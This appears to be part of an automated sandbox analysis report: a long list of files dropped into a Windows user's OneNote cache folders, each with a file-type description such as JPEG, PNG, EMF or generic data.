JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin (copy)

PNG image data, 50 x 556, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006K.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin (copy)

PNG image data, 171 x 552, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006M.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006O.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006Q.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006R.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006T.bin (copy)

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin (copy)

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006V.bin (copy)

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin (copy)

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000071.bin (copy)

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin (copy)

PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000074.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000077.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000078.bin (copy)

PNG image data, 50 x 500, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000079.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007B.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007D.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin (copy)

Windows Enhanced Metafile (EMF) image data version 0x10000

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007F.bin (copy)

PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007H.bin (copy)

PNG image data, 39 x 600, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007J.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007L.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007N.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007P.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin (copy)

PNG image data, 39 x 579, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007S.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin (copy)

PNG image data, 30 x 700, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007U.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000080.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000082.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000084.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000086.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000088.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin (copy)

PNG image data, 85 x 470, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008A.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008B.bin (copy)

PNG image data, 88 x 574, 8-bit colormap, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008C.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008E.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008G.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008H.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008I.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008K.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008M.bin (copy)

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin (copy)

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008O.bin (copy)

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Matlab v4 mat-file (little endian) H, numeric, rows 1051426662, columns 0

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000001.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000002.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000003.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000004.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

GIF image data, version 89a, 1012 x 327

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

ASCII text, with very long lines (380), with no line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000L.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001B.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001S.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

big endian ispell hash file (?), 8-bit, no capitalization, 26 flags

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003L.bin

OpenPGP Public Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003M.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003N.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003O.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003P.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

big endian ispell hash file (?), 8-bit, no capitalization, 26 flags

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

OpenPGP Secret Key

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

big endian ispell hash file (?), 8-bit, no capitalization, 26 flags

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004A.bin

data

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

data

dropped

